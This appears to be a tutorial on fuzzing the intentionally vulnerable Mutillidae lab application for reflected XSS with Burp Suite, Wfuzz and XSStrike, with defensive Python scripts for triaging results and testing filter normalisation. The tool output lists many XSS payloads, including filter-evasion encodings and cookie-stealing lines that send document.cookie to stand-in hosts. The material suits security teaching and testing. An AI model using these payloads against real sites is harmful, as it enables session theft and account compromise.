Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrike

Nov 27, 2018 11:34 PM

Cross-site scripting is one of the most common vulnerabilities found on the web today, with repercussions of this type of flaw ranging from harmless defacement to sensitive data exposure. Probing for XSS can be tedious and time-consuming for an attacker, but luckily there are tools available to make things a little easier, including Burp Suite, Wfuzz, and XSStrike.

Fuzzing Overview

Fuzzing is a technique used to test applications for security flaws in an automated fashion. The fuzzer, a piece of software designed to test for these flaws, feeds malformed or random data to a program as input in order to trigger bugs, which in a security context often turn out to be vulnerabilities. The generated input can be static, such as values loaded from a wordlist, or random, and newer fuzzers are starting to use algorithms that generate and adapt input dynamically based on the program's responses.

We will be using Mutillidae, a vulnerable web application, to test for XSS flaws. To get started, open up Mutillidae, and on the left, browse to "OWASP Top 10," then "Cross Site Scripting," followed by "Reflected," and finally "DNS Lookup." This will be our entry point for XSS fuzzing.

App 1: Burp Suite

Burp Suite is a powerful tool used to test web applications for vulnerabilities. The free Community Edition is included in Kali Linux. In its most common utilization, Burp is used as a proxy to intercept and modify requests.

We need to configure our browser to work with Burp. In Firefox, go to "Preferences," and scroll all the way down to the section titled Network Proxy. Click on the "Settings" button, select "Manual proxy configuration," and enter 127.0.0.1 as the HTTP Proxy and 8080 as the Port. Now, check "Use this proxy server for all protocols," and make sure it is blank under No Proxy for.

Finally, click "OK," and everything should be configured correctly. You can then fire up Burp Suite and start a new project. Navigate to the "Proxy" tab and ensure the "Intercept is on" button is pressed. This will allow us to modify the request and fuzz for XSS.

Next, back in Mutillidae, enter a value in the Hostname/IP text box, and hit "Lookup DNS" to submit the request (I just used 127.0.0.1 – it doesn't really matter here). The request should show up in Burp now.

Right-click anywhere in the request window, and select "Send to Intruder," then navigate to the "Intruder" tab. We will use the "Sniper" attack type to iterate through a list of payloads. Burp will automatically select positions to use, which are the parameters to test, but for now, we only need one. Hit the "Clear" button on the right, highlight the target host we entered earlier, and hit the "Add" button.

Next, go to the "Payloads" tab, and under Payload Options, press "Load." There is a useful wordlist located at /usr/share/wfuzz/wordlist/Injections/XSS.txt — browse to it and we are ready to launch the attack.

Press "Start attack," and a new window will pop up. Once the attack has iterated through all the payloads in our wordlist, the attack is finished and we can see all the requests and their status codes.

To demonstrate, let's take a look at request number 3. If we paste this payload into the DNS Lookup utility, an alert box will pop up proving that this page is indeed vulnerable to XSS.

Before we move on to other tools, make sure your browser's proxy configuration is changed back to use system settings.

App 2: Wfuzz

Wfuzz is another popular tool used to fuzz applications not only for XSS vulnerabilities, but also SQL injections, hidden directories, form parameters, and more. It is included in Kali by default.

To display help settings, type wfuzz -h at the terminal.

wfuzz -h

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
*                                                      *
* Version up to 1.4c coded by:                         *
* Christian Martorella (cmartorella@edge-security.com) *
* Carlos del ojo (deepbit@gmail.com)                   *
*                                                      *
* Version 1.4d to 2.2.11 coded by:                     *
* Xavier Mendez (xmendez@edge-security.com)            *
********************************************************

Usage:	wfuzz [options] -z payload,params <url>

	FUZZ, ..., FUZnZ  wherever you put these keywords wfuzz will replace them with the values of the specified payload.
	FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.

Options:
	-h      		    : This help
	--help			    : Advanced help
	--version		    : Wfuzz version details
	-e <type>		    : List of available encoders/payloads/iterators/printers/scripts
	
	-c			    : Output with colors
	-v			    : Verbose information.
	--interact		    : (beta) If selected,all key presses are captured. This allows you to interact with the program.
	
	-p addr			    : Use Proxy in format ip:port:type. Repeat option for using various proxies.
				      Where type could be SOCKS4,SOCKS5 or HTTP if omitted.

...

We will be testing the same page in Mutillidae for XSS vulnerabilities. Basic usage of Wfuzz includes specifying a wordlist file including the payloads to use with the -z flag, and the URL to test, replacing the parameter in question with FUZZ. We can also set the -c flag to get color output.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt http://172.16.1.102/mutillidae/index.php?page=FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39

==================================================================
ID	Response   Lines      Word         Chars          Payload
==================================================================

000020:  C=200    514 L	    1425 W	  21898 Ch	  "<IMG%20SRC=`javascript:alert("'WXSS'")`>"
000019:  C=200    514 L	    1425 W	  21812 Ch	  "<IMG%20SRC=javascript:alert(&quot;WXSS&quot;)>"
000021:  C=200    514 L	    1425 W	  21983 Ch	  "<IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>">"
000001:  C=200    514 L	    1420 W	  21769 Ch	  ""><script>""
000003:  C=200    514 L	    1420 W	  21907 Ch	  "<<script>alert("WXSS");//<</script>"
000016:  C=200    514 L	    1425 W	  21877 Ch	  "<IMG%20SRC="javascript:alert('WXSS')""
000015:  C=200    514 L	    1425 W	  21893 Ch	  "<IMG%20SRC="javascript:alert('WXSS');">"
000002:  C=200    514 L	    1420 W	  21870 Ch	  "<script>alert("WXSS")</script>"
000018:  C=200    514 L	    1425 W	  21858 Ch	  "<IMG%20SRC=JaVaScRiPt:alert('WXSS')>"
000017:  C=200    514 L	    1425 W	  21858 Ch	  "<IMG%20SRC=javascript:alert('WXSS')>"
000022:  C=200    514 L	    1425 W	  21973 Ch	  "<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>"
000023:  C=200    514 L	    1425 W	  21762 Ch	  "<IMG%20SRC='javasc	ript:alert(document.cookie)'>"
000024:  C=200    514 L	    1425 W	  21757 Ch	  "<IMG%20SRC="jav	ascript:alert('WXSS');">"
000025:  C=200    514 L	    1425 W	  21757 Ch	  "<IMG%20SRC="jav&#x09;ascript:alert('WXSS');">"
000027:  C=200    514 L	    1425 W	  21757 Ch	  "<IMG%20SRC="jav&#x0D;ascript:alert('WXSS');">"
000030:  C=200    514 L	    1425 W	  21903 Ch	  "<IMG%20LOWSRC="javascript:alert('WXSS')">"
000029:  C=200    514 L	    1425 W	  21903 Ch	  "<IMG%20DYNSRC="javascript:alert('WXSS')">"
000026:  C=200    514 L	    1425 W	  21757 Ch	  "<IMG%20SRC="jav&#x0A;ascript:alert('WXSS');">"
000028:  C=200    514 L	    1430 W	  21747 Ch	  "<IMG%20SRC="%20&#14;%20javascript:alert('WXSS');">"
000031:  C=200    514 L	    1425 W	  22060 Ch	  "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>"
000032:  C=200    514 L	    1425 W	  21727 Ch	  "<IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"
000033:  C=200    514 L	    1425 W	  21727 Ch	  "<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>"
000034:  C=200    514 L	    1425 W	  21727 Ch	  "<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"
000036:  C=200    514 L	    1425 W	  22191 Ch	  ""><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>"
000037:  C=200    514 L	    1425 W	  22196 Ch	  "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E"
000035:  C=200    514 L	    1425 W	  21950 Ch	  "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E"
000039:  C=200    514 L	    1420 W	  21763 Ch	  "'';!--"<XSS>=&{()}"
000038:  C=200    514 L	    1420 W	  22883 Ch	  "';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}"
000005:  C=200    514 L	    1420 W	  21911 Ch	  "'><script>alert(document.cookie)</script>"
000004:  C=200    514 L	    1420 W	  21895 Ch	  "<script>alert(document.cookie)</script>"
000006:  C=200    514 L	    1420 W	  21916 Ch	  "'><script>alert(document.cookie);</script>"
000007:  C=200    514 L	    1420 W	  21776 Ch	  "\";alert('XSS');//"
000008:  C=200    514 L	    1420 W	  21875 Ch	  "%3cscript%3ealert("WXSS");%3c/script%3e"
000009:  C=200    514 L	    1420 W	  21900 Ch	  "%3cscript%3ealert(document.cookie);%3c%2fscript%3e"
000010:  C=200    514 L	    1425 W	  21875 Ch	  "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E"
000011:  C=200    563 L	    1570 W	  24175 Ch	  "&ltscript&gtalert(document.cookie);</script>"
000012:  C=200    563 L	    1570 W	  24175 Ch	  "&ltscript&gtalert(document.cookie);&ltscript&gtalert"
000013:  C=200    514 L	    1420 W	  21964 Ch	  "<xss><script>alert('WXSS')</script></vulnerable>"
000014:  C=200    514 L	    1425 W	  21913 Ch	  "<IMG%20SRC='javascript:alert(document.cookie)'>"

Total time: 26.54032
Processed Requests: 39
Filtered Requests: 0
Requests/sec.: 1.469462

We can see each request ID, the response code, and the size of the response (lines, words, and characters). The payload sent from our wordlist file is shown at the end of each row, and near the bottom there is summary data including the total time and the number of requests processed. Also useful: when fuzzing an application that returns many different response codes, the --hc flag hides responses with the listed codes, such as 404s, so that only the interesting ones remain.
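As an added illustration, not part of the original article or of Wfuzz itself, the following Python script parses result rows in the table format shown above and applies two triage steps: hiding chosen status codes, as --hc does, and flagging responses whose line or word count departs from the most common one, which is where error pages, hints, or extra reflected markup tend to show up. The 200 rows are copied from the run above; the 404 row is constructed, and the baseline-by-mode approach and the word tolerance are my assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Result rows in the table format Wfuzz prints. The five 200 rows are copied
# from the run above; the 404 row is constructed to exercise code hiding.
SAMPLE_OUTPUT = """\
000001:  C=200    514 L\t    1420 W\t  21769 Ch\t  ""><script>""
000002:  C=200    514 L\t    1420 W\t  21870 Ch\t  "<script>alert("WXSS")</script>"
000011:  C=200    563 L\t    1570 W\t  24175 Ch\t  "&ltscript&gtalert(document.cookie);</script>"
000012:  C=200    563 L\t    1570 W\t  24175 Ch\t  "&ltscript&gtalert(document.cookie);&ltscript&gtalert"
000014:  C=200    514 L\t    1425 W\t  21913 Ch\t  "<IMG%20SRC='javascript:alert(document.cookie)'>"
000040:  C=404    9 L\t    32 W\t  276 Ch\t  "no-such-page"
"""

# One result row: id, status code, response line/word/char counts, quoted payload.
LINE_RE = re.compile(
    r'^(?P<id>\d+):\s+C=(?P<code>\d+)\s+(?P<lines>\d+) L\s+(?P<words>\d+) W\s+'
    r'(?P<chars>\d+) Ch\s+"(?P<payload>.*)"$'
)


@dataclass(frozen=True)
class Result:
    id: int
    code: int
    lines: int
    words: int
    chars: int
    payload: str


def parse_results(text):
    """Parse result rows; banner, header and totals lines do not match and are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append(Result(int(m["id"]), int(m["code"]), int(m["lines"]),
                               int(m["words"]), int(m["chars"]), m["payload"]))
    return rows


def hide_codes(rows, codes=(404,)):
    """What --hc does: drop rows whose status code is listed."""
    return [r for r in rows if r.code not in codes]


def baseline(rows):
    """(lines, words) of the typical response: the modal line count, then the modal
    word count among rows with that line count. Assumption: most payloads produce
    the same page, so the mode is the 'nothing special happened' response."""
    lines = Counter(r.lines for r in rows).most_common(1)[0][0]
    words = Counter(r.words for r in rows if r.lines == lines).most_common(1)[0][0]
    return lines, words


def outliers(rows, word_tolerance=10):
    """Rows whose size differs from the baseline. A reflected payload containing
    spaces shifts the word count by a few, so small word differences are tolerated;
    a different line count usually means an error page, a hint, or extra markup."""
    base_lines, base_words = baseline(rows)
    return [r for r in rows
            if r.lines != base_lines or abs(r.words - base_words) > word_tolerance]


if __name__ == "__main__":
    rows = hide_codes(parse_results(SAMPLE_OUTPUT))
    print("baseline (lines, words):", baseline(rows))
    for r in outliers(rows):
        print(f"{r.id:06d} C={r.code} {r.lines} L {r.words} W  {r.payload}")
```

Rows 000011 and 000012 stand out because the page grew by 49 lines, which is exactly the kind of response worth opening in a browser or in Burp's response viewer.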

Another helpful feature of Wfuzz is the ability to encode payloads in order to bypass defensive filters more effectively. To list the available encoders, use the following command.

wfuzz -e encoders

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

Available encoders:

  Category      | Name              | Summary
------------------------------------------------------------------------------------------------------------------------
  url_safe, url | urlencode         | Replace special characters in string using the %xx escape. Letters, digits, and
                |                   | the characters '_.-' are never quoted.
  url_safe, url | double urlencode  | Applies a double encode to special characters in string using the %25xx escape.
                |                   | Letters, digits, and the characters '_.-' are never quoted.
  url           | uri_double_hex    | Encodes ALL charachers using the %25xx escape.
  html          | html_escape       | Convert the characters '&', '<' and '>' in string to HTML-safe sequences.
  html          | html_hexadecimal  | Replaces ALL characters in string using the &#xx; escape
  hashes        | base64            | Encodes the given string using base64
  url           | doble_nibble_hex  | Replaces ALL characters in string using the %%dd%dd escape
  db            | mssql_char        | Converts ALL characters to MsSQL's char(xx)
  url           | utf8              | Replaces ALL characters in string using the \u00xx escape
  hashes        | md5               | Applies a md5 hash to the given string
  default       | random_upper      | Replaces random characters in string with its capitals letters
  url           | first_nibble_hex  | Replaces ALL characters in string using the %%dd? escape
  default       | hexlify           | Every byte of data is converted into the corresponding 2-digit hex representatio
                |                   | n.
  url           | second_nibble_hex | Replaces ALL characters in string using the %?%dd escape
  url           | uri_hex           | Encodes ALL charachers using the %xx escape.
  default       | none              | Returns string without changes
  hashes        | sha1              | Applies a sha1 hash to the given string
  url           | utf8_binary       | Replaces ALL characters in string using the \uxx escape
  url           | uri_triple_hex    | Encodes ALL charachers using the %25%xx%xx escape.
  url           | uri_unicode       | Replaces ALL characters in string using the %u00xx escape
  html          | html_decimal      | Replaces ALL characters in string using the &#dd; escape
  db            | oracle_char       | Converts ALL characters to Oracle's chr(xx)
  db            | mysql_char        | Converts ALL characters to MySQL's char(xx)

To encode the payloads, simply append the name of the desired encoder (in this case urlencode) to the -z file argument, separated from the wordlist path by a comma.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt,urlencode http://172.16.1.102/mutillidae/index.php?page=FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39

==================================================================
ID	Response   Lines      Word         Chars          Payload
==================================================================

000003:  C=200    514 L	    1420 W	  21907 Ch	  "%3C%3Cscript%3Ealert%28%22WXSS%22%29%3B//%3C%3C/script%3E"
000002:  C=200    514 L	    1420 W	  21870 Ch	  "%3Cscript%3Ealert%28%22WXSS%22%29%3C/script%3E"
000001:  C=200    514 L	    1420 W	  21769 Ch	  "%22%3E%3Cscript%3E%22"
000007:  C=200    514 L	    1420 W	  21776 Ch	  "%5C%22%3Balert%28%27XSS%27%29%3B//"
000005:  C=200    514 L	    1420 W	  21911 Ch	  "%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000009:  C=200    514 L	    1420 W	  21926 Ch	  "%253cscript%253ealert%28document.cookie%29%3B%253c%252fscript%253e"
000008:  C=200    514 L	    1420 W	  21891 Ch	  "%253cscript%253ealert%28%22WXSS%22%29%3B%253c/script%253e"
000004:  C=200    514 L	    1420 W	  21895 Ch	  "%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000010:  C=200    514 L	    1420 W	  21901 Ch	  "%253Cscript%253Ealert%28%2522X%2520SS%2522%29%3B%253C/script%253E"
000006:  C=200    514 L	    1420 W	  21916 Ch	  "%27%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C/script%3E"
000011:  C=200    514 L	    1420 W	  21924 Ch	  "%26ltscript%26gtalert%28document.cookie%29%3B%3C/script%3E"
000015:  C=200    514 L	    1420 W	  21903 Ch	  "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000012:  C=200    514 L	    1420 W	  21968 Ch	  "%26ltscript%26gtalert%28document.cookie%29%3B%26ltscript%26gtalert"
000014:  C=200    514 L	    1420 W	  21923 Ch	  "%3CIMG%2520SRC%3D%27javascript%3Aalert%28document.cookie%29%27%3E"
000019:  C=200    514 L	    1420 W	  21934 Ch	  "%3CIMG%2520SRC%3Djavascript%3Aalert%28%26quot%3BWXSS%26quot%3B%29%3E"
000013:  C=200    514 L	    1420 W	  21964 Ch	  "%3Cxss%3E%3Cscript%3Ealert%28%27WXSS%27%29%3C/script%3E%3C/vulnerable%3E"
000016:  C=200    514 L	    1420 W	  21887 Ch	  "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22"
000017:  C=200    514 L	    1420 W	  21868 Ch	  "%3CIMG%2520SRC%3Djavascript%3Aalert%28%27WXSS%27%29%3E"
000018:  C=200    514 L	    1420 W	  21868 Ch	  "%3CIMG%2520SRC%3DJaVaScRiPt%3Aalert%28%27WXSS%27%29%3E"
000020:  C=200    514 L	    1420 W	  21908 Ch	  "%3CIMG%2520SRC%3D%60javascript%3Aalert%28%22%27WXSS%27%22%29%60%3E"
000022:  C=200    514 L	    1420 W	  21983 Ch	  "%3CIMG%2520SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E"
000021:  C=200    514 L	    1420 W	  21993 Ch	  "%3CIMG%2520%22%22%22%3E%3CSCRIPT%3Ealert%28%22WXSS%22%29%3C/SCRIPT%3E%22%3E"
000023:  C=200    514 L	    1425 W	  21928 Ch	  "%3CIMG%2520SRC%3D%27javasc%09ript%3Aalert%28document.cookie%29%27%3E"
000025:  C=200    514 L	    1420 W	  21941 Ch	  "%3CIMG%2520SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000024:  C=200    514 L	    1425 W	  21908 Ch	  "%3CIMG%2520SRC%3D%22jav%09ascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000028:  C=200    514 L	    1420 W	  21966 Ch	  "%3CIMG%2520SRC%3D%22%2520%26%2314%3B%2520javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000027:  C=200    514 L	    1420 W	  21941 Ch	  "%3CIMG%2520SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000030:  C=200    514 L	    1420 W	  21913 Ch	  "%3CIMG%2520LOWSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000026:  C=200    514 L	    1420 W	  21941 Ch	  "%3CIMG%2520SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000029:  C=200    514 L	    1420 W	  21913 Ch	  "%3CIMG%2520DYNSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000031:  C=200    514 L	    1420 W	  22118 Ch	  "%3CIMG%2520SRC%3D%27%2526%2523x6a%3Bavasc%2526%2523000010ript%3Aa%2526%2523x6c%3Bert%28document.%2526%2523x63%3Bookie%29%27%3E"
000032:  C=200    514 L	    1420 W	  22562 Ch	  "%3CIMG%2520SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E"
000033:  C=200    514 L	    1420 W	  22967 Ch	  "%3CIMG%2520SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E"
000035:  C=200    514 L	    1420 W	  21996 Ch	  "%27%253CIFRAME%2520SRC%3Djavascript%3Aalert%28%252527XSS%252527%29%253E%253C/IFRAME%253E"
000034:  C=200    514 L	    1420 W	  22507 Ch	  "%3CIMG%2520SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E"
000036:  C=200    514 L	    1420 W	  22191 Ch	  "%22%3E%3Cscript%3Edocument.location%3D%27http%3A//cookieStealer/cgi-bin/cookie.cgi%3F%27%2Bdocument.cookie%3C/script%3E"
000037:  C=200    514 L	    1420 W	  22396 Ch	  "%2522%253E%253Cscript%253Edocument%252Elocation%253D%2527http%253A%252F%252Fyour%252Esite%252Ecom%252Fcgi%252Dbin%252Fcookie%252Ecgi%253F%2527%2520%252Bdocument%252Ecookie%253C%252Fscript%253E"
000038:  C=200    514 L	    1420 W	  22906 Ch	  "%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%3E%3C/SCRIPT%3E%21--%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/SCRIPT%3E%3D%26%7B%7D"
000039:  C=200    514 L	    1420 W	  21796 Ch	  "%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D"

Total time: 27.33954
Processed Requests: 39
Filtered Requests: 0
Requests/sec.: 1.426505

The results are similar to before, but now each payload is URL encoded.
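To see why the encoder options matter from the filtering side, here is an added Python example (not from the article or from Wfuzz) that takes payloads copied from the two runs above and compares a literal substring check on the raw parameter value with the same check after canonicalising the value roughly the way a browser interprets it: percent-decoding and entity-decoding until stable, then stripping the control characters and whitespace that browsers ignore inside a URL scheme or tag name. The marker list, the bounded three-round decode, and the benign hostname are my assumptions.

```python
import html
import re
from urllib.parse import unquote

# Inputs copied from the payloads in the Wfuzz runs above (the tab in the wordlist
# entry is written as a Python escape); "benign" is a constructed control value.
SAMPLES = {
    "plain": '<script>alert("WXSS")</script>',
    "mixed_case": "<IMG%20SRC=JaVaScRiPt:alert('WXSS')>",
    "tab_in_scheme": "<IMG%20SRC=\"jav\tascript:alert('WXSS');\">",
    "entity_in_scheme": "<IMG%20SRC=\"jav&#x0A;ascript:alert('WXSS');\">",
    "entity_inside_urlencoding":
        "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>",
    "decimal_entities":
        "<IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;"
        "&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
    "legacy_entities": "&ltscript&gtalert(document.cookie);</script>",
    "double_urlencoded": "%253cscript%253ealert%28document.cookie%29%3B%253c%252fscript%253e",
    "benign": "mail.example.org",
}

# Markers a first-attempt filter typically looks for (assumed list).
MARKERS = ("<script", "javascript:")


def naive_filter(value):
    """Literal, case-sensitive substring check on the raw parameter value."""
    return any(marker in value for marker in MARKERS)


def normalize(value, max_rounds=3):
    """Canonicalise for matching only (this is not a sanitiser): percent-decode and
    entity-decode until the text stops changing, bounded so a %2525... chain cannot
    loop forever, then drop ASCII controls and whitespace and lowercase."""
    text = value
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(text))
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"[\x00-\x20]", "", text)
    return text.lower()


def normalized_filter(value):
    """Same markers, matched against the canonical form."""
    return naive_filter(normalize(value))


def evasions(samples):
    """Names of inputs that slip past the raw check but are caught once normalised."""
    return [name for name, value in samples.items()
            if not naive_filter(value) and normalized_filter(value)]


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:27s} naive={naive_filter(value)!s:5s} "
              f"normalized={normalized_filter(value)}")
```

Every encoded variant from the wordlist passes the raw check and fails the normalised one, which is the practical argument for decoding and canonicalising before any server-side pattern match, and for relying on context-aware output encoding rather than blocklists as the actual fix.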

App 3: XSStrike

The last tool we will look at today is XSStrike. It is a dedicated suite for detecting cross-site scripting vulnerabilities that includes an intelligent payload generator, a fuzzer, a crawler, WAF detection, and more. XSStrike is currently in beta.

Before we can use this tool, we need to download it from GitHub and install it on our machine. The process may vary slightly depending on the system, but for reference, I am using the latest version of Kali. XSStrike works best with Python 3.

Download the tool using the wget utility in the terminal, as seen in the below command.

wget https://github.com/s0md3v/XSStrike/archive/master.zip

Next, extract the archive by typing unzip master.zip and changing into the extracted directory with cd XSStrike-master. Now we should be able to run the tool by typing python3 xsstrike.py at the prompt.

It may throw an error stating that the fuzzywuzzy module is not installed.

python3 xsstrike.py

Traceback (most recent call last):
  File "xsstrike.py", line 35, in <module>
    from core.checker import checker
  File "/root/XSStrike-master/core/checker.py", line 3, in <module>
    from fuzzywuzzy import fuzz
ModuleNotFoundError: No module named 'fuzzywuzzy'

If this is the case, just use pip3 install fuzzywuzzy to install the missing module. Now we should be good to go.

To display the help menu, use the -h flag.

python3 xsstrike.py -h

	XSStrike v3.0-beta

usage: xsstrike.py [-h] [-u TARGET] [--data DATA] [--fuzzer] [--update]
                   [--timeout] [--params] [--crawl] [-l LEVEL] [--headers]
                   [-t THREADS] [-d DELAY] [--skip-poc] [--skip-dom]

optional arguments:
  -h, --help            show this help message and exit
  -u TARGET, --url TARGET
                        url
  --data DATA           post data
  --fuzzer              fuzzer
  --update              update
  --timeout             timeout
  --params              find params
  --crawl               crawl
  -l LEVEL, --level LEVEL
                        level of crawling
  --headers             add headers
  -t THREADS, --threads THREADS
                        number of threads
  -d DELAY, --delay DELAY
                        delay between requests
  --skip-poc            skip poc generation
  --skip-dom            skip dom checking

XSStrike's basic usage is quite simple — use the -u flag followed by the URL to test.

python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php

	XSStrike v3.0-beta

[~] Checking for DOM vulnerabilities
------------------------------------------------------------
52  			//document.getElementById("idSystemInformationHeading").innerHTML = l_loginMessage;
53  			document.getElementById("idHintsStatusHeading").innerHTML = 'Hints: ' + l_hintsStatus;
54  			document.getElementById("idSecurityLevelHeading").innerHTML = 'Security Level: ' + l_securityLevel + ' (' + l_securityLevelDescription + ')';
446 								Google Hacking Database
495 	<a 	onclick="document.location.href='';"
584 				window.localStorage.setItem("LocalStorageTarget","This is set by the index.php page");
585 				window.sessionStorage.setItem("SessionStorageTarget","This is set by the index.php page");
------------------------------------------------------------
[+] Potentially vulnerable objects found
[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 4
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 9256
------------------------------------------------------------
[+] Payload: "><A%0aoNMOUseoveR%0d=%0d(confirm)() x>z
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]

The tool begins by checking for DOM-based XSS, listing the lines of the page's JavaScript that write to potentially dangerous sinks such as innerHTML, document.location.href, and Web Storage. Reflected XSS is tested next: XSStrike counts how many times the parameter is reflected, analyses the context of each reflection, and the interactive payload generator then displays a candidate payload together with its projected efficiency and confidence. To continue scanning, hit y at the prompt.

------------------------------------------------------------
[+] Payload: "><d3v%0aONPoINtERENtER+=+(confirm)()>z
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]

We can also skip the DOM-based checking with the --skip-dom option.

python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php --skip-dom

	XSStrike v3.0-beta

[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 4
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 9256
------------------------------------------------------------
[+] Payload: "><HtmL%09oNPoINterENtEr%0d=%0dconfirm() x//
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]

XSStrike also contains a fuzzer used to test filters and WAFs, probing which tags, attributes, and event-handler spellings are passed through unchanged. This can be extremely slow, though, because it inserts random delays between requests. To speed things up, we can fix the delay at one second with the -d flag alongside the --fuzzer option.

python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php --skip-dom --fuzzer -d 1

	XSStrike v3.0-beta

[+] WAF Status: Offline
[!] Fuzzing parameter: page
[passed]   <test
[passed]   <test//
[passed]   <test>
[passed]   <test x>
[passed]   <test x=y
[passed]   <test x=y//
[passed]   <test/oNxX=yYy//
[passed]   <test oNxX=yYy>
[passed]   <test onload=x
[passed]   <test/o%00nload=x
[passed]   <test sRc=xxx
[passed]   <test data=asa
[passed]   <test data=javascript:asa
[passed]   <svg x=y>
[passed]   <details x=y//
[passed]   <a href=x//
[passed]   <emBed x=y>
[passed]   <object x=y//
[passed]   <bGsOund sRc=x>
